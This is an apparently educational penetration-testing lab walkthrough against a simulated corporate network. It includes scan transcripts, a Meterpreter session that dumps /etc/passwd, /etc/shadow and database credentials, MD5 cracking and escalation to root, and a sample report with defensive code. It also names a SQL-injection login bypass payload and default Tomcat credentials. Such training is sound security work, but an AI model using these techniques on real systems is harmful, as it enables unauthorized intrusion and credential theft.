Penetration Testing Lab

Welcome to the Ethical Hacking Lab

This interactive lab will guide you through the process of conducting a penetration test on a simulated corporate network. You'll learn how to identify vulnerabilities, exploit them ethically, and provide remediation recommendations.

The lab is designed to provide hands-on experience with popular penetration testing tools like Metasploit, Nmap, and more.

Important Notice

The skills taught in this lab are for educational purposes only. Always obtain proper authorization before performing security testing on any system. Unauthorized penetration testing is illegal and unethical.


The Penetration Testing Methodology

Penetration testing follows a structured methodology to systematically identify and exploit vulnerabilities in a controlled manner. The main phases include:

1. Reconnaissance

Gathering information about the target system or network using both passive and active techniques. This may include OSINT (Open Source Intelligence), DNS enumeration, and social engineering.

2. Scanning

Actively probing the target to identify open ports, running services, operating systems, and potential vulnerabilities. Tools like Nmap, Nessus, and OpenVAS are commonly used in this phase.

3. Exploitation

Leveraging discovered vulnerabilities to gain unauthorized access to systems. This may involve using tools like Metasploit, custom exploit code, or manual techniques to exploit weaknesses.

4. Post-Exploitation

After gaining access, collecting sensitive information, establishing persistence, escalating privileges, and pivoting to other systems on the network to demonstrate potential impact.

5. Reporting

Documenting findings, including discovered vulnerabilities, exploitation methods, and specific remediation recommendations. The report should be comprehensive yet understandable to both technical and non-technical stakeholders.

Lab Environment

This lab provides a safe, isolated environment where you can practice penetration testing techniques without legal or ethical concerns. The virtual network consists of deliberately vulnerable machines that simulate real-world scenarios.

You'll have access to common penetration testing tools including:

  • Nmap - Network scanning and host discovery
  • Metasploit Framework - Exploitation toolkit
  • Wireshark - Network packet analysis
  • Burp Suite - Web application security testing
  • John the Ripper - Password cracking

Phase 1: Reconnaissance

Reconnaissance involves gathering information about your target to understand its infrastructure, technologies, and potential entry points. This phase is crucial as it forms the foundation for the rest of your penetration test.

Target Network Information

You've been engaged to perform a penetration test on the following organization:

  • Company Name: Acme Secure Technologies, Inc.
  • Domain: acmesecuretech.lab
  • IP Range: 192.168.1.0/24
  • Scope: All systems within the IP range

Reconnaissance Techniques

Start by gathering information using passive techniques that don't directly interact with the target systems:

  • Domain and whois information
  • DNS records and subdomain enumeration
  • Public information (social media, job postings, etc.)
  • Technology stack identification

Terminal
root@kali:~# whois acmesecuretech.lab
Domain Name: acmesecuretech.lab
Registrar: Internal Lab Domain
Registered On: 2023-01-15
Registrant Organization: Acme Secure Technologies, Inc.
Registrant Country: US
Admin Email: admin@acmesecuretech.lab
root@kali:~# host -t ns acmesecuretech.lab
acmesecuretech.lab name server ns1.acmesecuretech.lab.
acmesecuretech.lab name server ns2.acmesecuretech.lab.
root@kali:~# host -t mx acmesecuretech.lab
acmesecuretech.lab mail is handled by 10 mail.acmesecuretech.lab.
root@kali:~# dnsrecon -d acmesecuretech.lab
[*] Performing General DNS Queries for acmesecuretech.lab
[*] SOA ns1.acmesecuretech.lab 192.168.1.10
[*] NS ns1.acmesecuretech.lab 192.168.1.10
[*] NS ns2.acmesecuretech.lab 192.168.1.11
[*] MX mail.acmesecuretech.lab 192.168.1.15
[*] A www.acmesecuretech.lab 192.168.1.20
[*] A portal.acmesecuretech.lab 192.168.1.25
[*] A intranet.acmesecuretech.lab 192.168.1.30
[*] A admin.acmesecuretech.lab 192.168.1.35
root@kali:~# theHarvester -d acmesecuretech.lab -b all
[*] Starting theHarvester 4.1.0

[*] Emails found: 4
[+] admin@acmesecuretech.lab
[+] john.smith@acmesecuretech.lab
[+] sarah.jones@acmesecuretech.lab
[+] helpdesk@acmesecuretech.lab

[*] Hosts found: 7
[+] ns1.acmesecuretech.lab - 192.168.1.10
[+] ns2.acmesecuretech.lab - 192.168.1.11
[+] mail.acmesecuretech.lab - 192.168.1.15
[+] www.acmesecuretech.lab - 192.168.1.20
[+] portal.acmesecuretech.lab - 192.168.1.25
[+] intranet.acmesecuretech.lab - 192.168.1.30
[+] admin.acmesecuretech.lab - 192.168.1.35

Phase 2: Scanning & Enumeration

Now that you've gathered basic information about the target network, it's time to actively scan for open ports, running services, and potential vulnerabilities. This phase helps identify specific attack vectors for the exploitation phase.


Web Server (192.168.1.20)

Scanning www.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.20
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:30 EDT
Nmap scan report for www.acmesecuretech.lab (192.168.1.20)
Host is up (0.00042s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:93:44:24:4b (RSA)
| 256 46:d4:28:b9:e8:d5:c5:b9:9e:f2:4b:39:9e:de:28:e5 (ECDSA)
|_ 256 8d:2c:6f:b8:2f:55:e6:6c:89:2f:ac:2c:33:c3:19:f2 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=www.acmesecuretech.lab/organizationName=Acme Secure Technologies, Inc.
8080/tcp open http Apache Tomcat 9.0.31
|_http-title: Acme Management Console
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# nikto -h 192.168.1.20
- Nikto v2.1.6
---------------------
+ Target IP: 192.168.1.20
+ Target Hostname: www.acmesecuretech.lab
+ Target Port: 80
---------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2025-04-07 15:33:25 (GMT-4) (125 seconds)
---------------------
+ 1 host(s) tested

Mail Server (192.168.1.15)

Scanning mail.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:35 EDT
Nmap scan report for mail.acmesecuretech.lab (192.168.1.15)
Host is up (0.00035s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
Service Info: Host: mail.acmesecuretech.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# telnet 192.168.1.15 25
Trying 192.168.1.15...
Connected to 192.168.1.15.
Escape character is '^]'.
220 mail.acmesecuretech.lab ESMTP Postfix (Ubuntu)
EHLO kali
250-mail.acmesecuretech.lab
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
VRFY admin
252 2.0.0 admin
VRFY john.smith
252 2.0.0 john.smith
QUIT
221 2.0.0 Bye
Connection closed by foreign host.
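
As an added example (not part of the lab's own material), the following Python audits a captured SMTP EHLO exchange the way a mail administrator would check their own server: it parses the advertised extensions and the VRFY replies and turns them into remediation findings. The transcript is a constructed copy of the session above; the Postfix setting named in the finding, disable_vrfy_command, is a real main.cf option.

```python
"""Audit a captured SMTP EHLO exchange for settings a defender would change.
Added example, not part of the lab; the transcript is a constructed copy of
the lab's session with mail.acmesecuretech.lab."""

# Constructed sample: the EHLO reply and VRFY probes from the lab transcript.
SMTP_TRANSCRIPT = """\
220 mail.acmesecuretech.lab ESMTP Postfix (Ubuntu)
EHLO kali
250-mail.acmesecuretech.lab
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
VRFY admin
252 2.0.0 admin
VRFY john.smith
252 2.0.0 john.smith
QUIT
221 2.0.0 Bye
"""


def parse_ehlo_extensions(transcript: str) -> dict:
    """Return the extensions the server advertised as {KEYWORD: argument}.

    Lines look like '250-KEYWORD [arg]', or '250 KEYWORD [arg]' for the last
    one; the very first 250 line carries the server's name, not an extension.
    """
    extensions = {}
    first = True
    for line in transcript.splitlines():
        if not line.startswith("250"):
            continue
        body = line[4:].strip()  # drop the '250-' / '250 ' prefix
        if first:
            first = False
            continue
        keyword, _, argument = body.partition(" ")
        extensions[keyword.upper()] = argument
    return extensions


def vrfy_responses(transcript: str) -> list:
    """Pair each 'VRFY <user>' command with the reply code that followed it."""
    results = []
    lines = transcript.splitlines()
    for i, line in enumerate(lines[:-1]):
        if line.upper().startswith("VRFY "):
            user = line.split(None, 1)[1]
            code = lines[i + 1].split()[0]
            results.append((user, code))
    return results


def audit_smtp(transcript: str) -> list:
    """Produce defender-oriented findings from the transcript."""
    findings = []
    ext = parse_ehlo_extensions(transcript)
    if "VRFY" in ext:
        findings.append("VRFY advertised: set disable_vrfy_command = yes in Postfix main.cf")
    # A 2xx reply to VRFY confirms the mailbox exists; once VRFY is disabled
    # Postfix answers 502 instead, so this list should become empty.
    confirmed = [u for u, code in vrfy_responses(transcript) if code.startswith("2")]
    if confirmed:
        findings.append(f"VRFY confirmed {len(confirmed)} account(s): {', '.join(confirmed)}")
    if "STARTTLS" not in ext:
        findings.append("STARTTLS not offered: submissions would travel in clear text")
    return findings
```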

Employee Portal (192.168.1.25)

Scanning portal.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.25
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:40 EDT
Nmap scan report for portal.acmesecuretech.lab (192.168.1.25)
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Employee Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL 8.0.27-0ubuntu0.20.04.1
| mysql-info:
| Protocol: 10
| Version: 8.0.27-0ubuntu0.20.04.1
| Thread ID: 13
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# dirb http://192.168.1.25
DIRB v2.22
==============
START_TIME: Wed Apr 7 15:42:35 2025
URL_BASE: http://192.168.1.25/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-------------
GENERATED WORDS: 4612
== Scanning ==
+ http://192.168.1.25/admin (CODE:200|SIZE:1234)
+ http://192.168.1.25/assets (CODE:403|SIZE:277)
+ http://192.168.1.25/css (CODE:403|SIZE:277)
+ http://192.168.1.25/images (CODE:403|SIZE:277)
+ http://192.168.1.25/index.php (CODE:200|SIZE:8701)
+ http://192.168.1.25/js (CODE:403|SIZE:277)
+ http://192.168.1.25/login.php (CODE:200|SIZE:2541)
+ http://192.168.1.25/logout.php (CODE:302|SIZE:0)
+ http://192.168.1.25/profile.php (CODE:302|SIZE:0)
+ http://192.168.1.25/server-status (CODE:403|SIZE:277)
END_TIME: Wed Apr 7 15:48:12 2025
root@kali:~# curl -s http://192.168.1.25/login.php | grep form
<form action="login.php" method="post" class="login-form">
<div class="form-group">
<label for="username">Username</label>
<input type="text" class="form-control" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" class="form-control" id="password" name="password" required>
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>

Admin Server (192.168.1.35)

Scanning admin.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.35
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:50 EDT
Nmap scan report for admin.acmesecuretech.lab (192.168.1.35)
Host is up (0.00051s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Admin Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.11.6-Ubuntu (Ubuntu Linux 6.1)
3389/tcp open rdp xrdp
5432/tcp open postgresql PostgreSQL DB 12.9
Service Info: Host: ADMIN-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# smbclient -L //192.168.1.35 -N
Sharename Type Comment
----------- ---- -------
print$ Disk Printer Drivers
backups Disk Company Backups
IPC$ IPC IPC Service (Samba 4.11.6-Ubuntu)

Server Comment
--------- -------
ADMIN-SERVER Acme Admin Server

Workgroup Master
--------- -------
WORKGROUP ADMIN-SERVER
root@kali:~# smbclient //192.168.1.35/backups -N
Try "help" to get a list of possible commands.
smb: \> ls
  . D 0 Wed Mar 15 13:15:31 2025
  .. D 0 Wed Mar 15 13:15:31 2025
  config_backup.zip N 264082 Wed Mar 15 10:22:36 2025
  employee_list.xlsx N 52341 Wed Mar 15 09:46:12 2025

              64864 blocks of size 1024. 42563 blocks available
smb: \> exit
root@kali:~# searchsploit apache 2.4.41
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.41 - Remote Code Execution | linux/remote/49933.py
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Phase 3: Exploitation

After identifying potential vulnerabilities during the scanning phase, you can now attempt to exploit these weaknesses to gain unauthorized access to the target systems. Remember to document all successful exploits for the final report.

Metasploit Framework

Use Metasploit to exploit known vulnerabilities in the target systems. The framework includes numerous exploit modules, payloads, and post-exploitation tools.

SQLMap

Automated SQL injection tool that detects and exploits SQL injection vulnerabilities in web applications. Useful for testing the employee portal login form.

Hydra

Fast and flexible online password cracking tool that supports numerous protocols including SSH, FTP, HTTP, SMB, and more. Use it for brute force login attempts.

Burp Suite

Web application security testing platform that can intercept and modify HTTP/HTTPS traffic, find vulnerabilities, and exploit web application flaws.

Phase 4: Post-Exploitation

After gaining initial access to the target systems, the post-exploitation phase focuses on maintaining access, escalating privileges, and extracting valuable information. This phase demonstrates the potential impact of the identified vulnerabilities.

Post-Exploitation Activities

Common post-exploitation activities include:

  • Privilege escalation to gain administrative/root access
  • Data exfiltration of sensitive information
  • Lateral movement to other systems on the network
  • Persistence mechanisms to maintain access
  • Evidence collection to document the compromise

Post-Exploitation Terminal
msf6 > sessions -i 1
[*] Starting interaction with session 1...

meterpreter > getuid
Server username: www-data

meterpreter > sysinfo
Computer : portal.acmesecuretech.lab
OS : Ubuntu 20.04 (Linux 5.4.0-120-generic #136-Ubuntu SMP x86_64)
Meterpreter : php/linux

meterpreter > run post/linux/gather/enum_system
[*] Running module against portal.acmesecuretech.lab
[*] Gathering system information...
[+] Domain: WORKGROUP
[+] Hostname: portal
[+] Kernel: 5.4.0-120-generic #136-Ubuntu SMP
[+] Kernel Hardware: x86_64
[+] Distro: Ubuntu 20.04.4 LTS
[+] Desktop Environment: GNOME
[+] This is a virtual machine

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
john:x:1000:1000:John Smith:/home/john:/bin/bash
sarah:x:1001:1001:Sarah Jones:/home/sarah:/bin/bash
admin:x:1002:1002:System Administrator:/home/admin:/bin/bash

meterpreter > find / -name "config.php" -type f 2>/dev/null
/var/www/html/admin/config.php
/var/www/html/includes/config.php

meterpreter > cat /var/www/html/includes/config.php
<?php
// Database connection settings
define('DB_HOST', 'localhost');
define('DB_USER', 'portal_user');
define('DB_PASS', 'P@55w0rd123!');
define('DB_NAME', 'employee_portal');

// Application settings
define('APP_NAME', 'Acme Secure Technologies Employee Portal');
define('ADMIN_EMAIL', 'admin@acmesecuretech.lab');
?>

meterpreter > background
[*] Backgrounding session 1...

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "show databases;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database           |
+--------------------+
| information_schema |
| employee_portal    |
+--------------------+

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "use employee_portal; show tables;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+---------------------------+
| Tables_in_employee_portal |
+---------------------------+
| employees                 |
| login_attempts            |
| users                     |
+---------------------------+

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "use employee_portal; select username, password from users;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+------------------------------------------+
| username | password                                 |
+----------+------------------------------------------+
| admin    | 5f4dcc3b5aa765d61d8327deb882cf99         |
| john     | 482c811da5d5b4bc6d497ffa98491e38         |
| sarah    | 8cb2237d0679ca88db6464eac60da96345513964 |
+----------+------------------------------------------+

root@kali:~# echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt
root@kali:~# john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE (2025-04-07 16:12) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..michael
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

root@kali:~# ssh admin@192.168.1.35
admin@192.168.1.35's password: password
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-120-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Mon Apr 5 09:32:45 2025 from 192.168.1.100
admin@admin-server:~$ sudo -l
[sudo] password for admin: password
Matching Defaults entries for admin on admin-server:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on admin-server:
(ALL : ALL) ALL

admin@admin-server:~$ sudo su -
root@admin-server:~# id
uid=0(root) gid=0(root) groups=0(root)

root@admin-server:~# ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.35 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::216:3eff:fe19:8f57 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:19:8f:57 txqueuelen 1000 (Ethernet)
RX packets 2563 bytes 1956732 (1.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1789 bytes 284781 (284.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 168 bytes 12864 (12.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 12864 (12.8 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@admin-server:~# cat /etc/shadow | grep admin
admin:$6$rPXoN.0h$8rEUmj9xVgDSg0IvXMFG4OT6pYObDD5zLJKZVSMHaH9ZwafpNL3cQKlK4CIxKGO/Uw0kMDFzUlHkOjGEiEZVK/:18752:0:99999:7:::

Post-Exploitation Findings

Collected Sensitive Information:

  1. Database credentials for the employee portal (mysql user: portal_user, password: P@55w0rd123!)
  2. User account credentials (admin/password, john/unknown, sarah/unknown)
  3. Full list of system users including administrative accounts
  4. Administrative access to the admin server (192.168.1.35)
  5. Root/privileged access to multiple systems

Potential Impact:

  • Complete compromise of the company's internal network
  • Access to sensitive employee data and company information
  • Ability to modify or delete critical systems and data
  • Potential for lateral movement to other connected networks

Phase 5: Reporting

The final phase of a penetration test is to compile a comprehensive report documenting your findings, the methodology used, and providing actionable recommendations for remediation. A good penetration test report helps the organization understand their security posture and prioritize fixes.

Elements of a Good Penetration Test Report

A well-structured penetration test report typically includes:

  • Executive Summary for non-technical stakeholders
  • Detailed methodology and scope
  • Findings with severity ratings and evidence
  • Risk assessment and potential business impact
  • Specific remediation recommendations
  • Technical appendices with detailed proof-of-concept information

Penetration Test Report - Executive Summary

This penetration test was conducted against Acme Secure Technologies' network infrastructure between April 5-7, 2025. The assessment identified several critical and high-risk vulnerabilities that could allow malicious actors to compromise the organization's systems and data.

The most significant findings include:

  1. SQL Injection in Employee Portal - Allows complete bypass of authentication controls and access to sensitive employee information
  2. Default Credentials on Tomcat Manager - Provides the ability to deploy malicious web applications to the production web server
  3. Insecure File Sharing Configuration - Exposes sensitive configuration backups and employee data
  4. Weak Password Policies - Administrative accounts using easily guessable passwords
  5. Unrestricted Lateral Movement - Lack of network segmentation allowing easy pivoting between systems

Overall, the security posture of the organization is concerning. Immediate remediation of the identified vulnerabilities is strongly recommended to prevent potential data breaches or system compromise.

Vulnerability Details

SQL Injection in Employee Portal (Severity: High)

Description: The employee portal login form at http://192.168.1.25/login.php is vulnerable to SQL injection attacks, allowing authentication bypass and unauthorized access to the application.

Evidence: Authentication bypass was achieved using the payload admin' or 1=1 -- in the username field. This provided access to the portal with administrative privileges.

Impact: An attacker can bypass authentication, access sensitive employee data, and potentially extract database contents including user credentials.

Recommendation: Implement parameterized SQL queries or prepared statements to prevent SQL injection. Use an ORM framework if possible and validate all user inputs.
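
To make the finding and its fix concrete, here is an added Python example (not the portal's own code) that runs the report's payload against a login query built by string concatenation and against the parameterized version recommended above. The schema, the stored MD5 hashes and the function names are assumptions modelled on the lab's findings, using an in-memory SQLite database.

```python
"""Vulnerable vs. parameterized login, driven by the payload from the report.
Added example, not the portal's code; schema and logic are assumptions."""
import hashlib
import sqlite3

# Constructed sample data: the usernames and unsalted MD5 hashes seen in the
# lab's dump of the users table (the portal's existing, weak storage scheme,
# kept here only so the login logic mirrors the portal).
USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    ("john", "482c811da5d5b4bc6d497ffa98491e38"),
]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the employee_portal database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """The flawed pattern: user input is pasted into the SQL text, so a quote
    in the username ends the string literal and '--' comments out the rest.
    Returns the matched username, or None."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + pw_hash + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """The remediation: placeholders keep the input as data, never as SQL,
    so the same payload is simply a username that does not exist."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    """Run the payload quoted in the report against both implementations."""
    conn = make_db()
    payload = "admin' or 1=1 --"
    return {
        "vulnerable": login_vulnerable(conn, payload, "wrong"),  # bypassed
        "fixed": login_fixed(conn, payload, "wrong"),            # rejected
        "legit": login_fixed(conn, "admin", "password"),         # real login
    }
```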

Default Credentials on Tomcat Manager (Severity: High)

Description: The Apache Tomcat Manager application on http://192.168.1.20:8080/manager/ uses default credentials, allowing unauthorized access to the web application management interface.

Evidence: Access was gained using the credentials tomcat:s3cret, which are well-known default credentials for Tomcat installations.

Impact: An attacker can deploy malicious web applications to the server, which can lead to remote code execution and complete system compromise.

Recommendation: Change default credentials immediately. Implement a strong, unique password and consider implementing IP restrictions for accessing the management interface.

Insecure File Sharing Configuration (Severity: Medium)

Description: The Samba share "backups" on 192.168.1.35 allows anonymous access without authentication, exposing sensitive files.

Evidence: Access was gained using the command smbclient //192.168.1.35/backups -N, which connected without requiring credentials. Sensitive files such as configuration backups and employee lists were accessible.

Impact: An attacker can access sensitive company data, including configuration files that may contain credentials and employee information.

Recommendation: Reconfigure the Samba share to require authentication, implement proper access controls, and review the necessity of sharing sensitive files.
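
As an added example (not the lab's code), the following Python reads an smb.conf, flags every share that admits the guest account, and carries a corrected stanza beside the weak one. The weak configuration is a constructed reconstruction of settings that would produce the lab's anonymous "backups" share; the page does not show the real file, and the group name backupadmins is an assumption.

```python
"""Audit smb.conf for shares reachable without credentials.
Added example, not the lab's code; both configs below are constructed."""
import configparser

# Constructed: the kind of config behind the lab's anonymous 'backups' share.
WEAK_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Acme Admin Server
map to guest = Bad User

[backups]
path = /srv/backups
comment = Company Backups
guest ok = yes
read only = no

[print$]
path = /var/lib/samba/printers
comment = Printer Drivers
guest ok = no
"""

# Constructed: the same share after the report's recommendation is applied.
FIXED_SMB_CONF = """\
[global]
workgroup = WORKGROUP
server string = Acme Admin Server
map to guest = Never

[backups]
path = /srv/backups
comment = Company Backups
guest ok = no
valid users = @backupadmins
read only = yes
"""

SMB_TRUE = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like: case-insensitive keys that may contain spaces."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp


def anonymous_shares(text: str) -> list:
    """Return (share, reason) for each share that admits the guest account.

    'guest ok = yes' (synonym: 'public = yes') is what let the lab's
    'smbclient //192.168.1.35/backups -N' connect without credentials.
    """
    cp = parse_smb_conf(text)
    findings = []
    for share in cp.sections():
        if share == "global":
            continue
        sec = cp[share]
        guest_ok = sec.get("guest ok", sec.get("public", "no")).strip().lower()
        if guest_ok in SMB_TRUE:
            writable = sec.get("read only", "yes").strip().lower() not in SMB_TRUE
            findings.append((share, "guest ok = yes" + (", writable" if writable else "")))
    return findings


def guest_mapping_enabled(text: str) -> bool:
    """True when 'map to guest' is not 'Never', i.e. a login that fails with an
    unknown user name is silently downgraded to guest instead of rejected."""
    cp = parse_smb_conf(text)
    if not cp.has_section("global"):
        return False
    return cp["global"].get("map to guest", "Never").strip().lower() != "never"
```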

Remediation Recommendations

Short-term Recommendations (0-30 days):

  1. Fix the SQL injection vulnerability in the employee portal by implementing parameterized queries
  2. Change all default and weak passwords, especially for administrative accounts
  3. Reconfigure the Samba share to require authentication and restrict access
  4. Apply security patches for Apache, Tomcat, and other services
  5. Enable input validation for all web applications
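
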